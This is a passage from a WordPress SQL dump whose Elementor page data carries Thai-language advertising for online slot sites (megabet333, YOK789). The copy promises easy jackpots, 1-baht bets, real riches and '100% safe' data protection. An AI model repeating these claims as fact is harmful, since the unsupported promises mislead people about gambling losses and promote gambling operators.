\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2069,301,'_thumbnail_id','273'),(2070,301,'_elementor_edit_mode','builder'),(2071,301,'_elementor_template_type','wp-page'),(2072,301,'_elementor_version','3.32.5'),(2073,301,'_elementor_pro_version','3.32.3'),(2074,301,'_wp_page_template','default'),(2075,301,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}');
INSERT INTO `IwGJ28BV_postmeta` VALUES (2076,301,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a 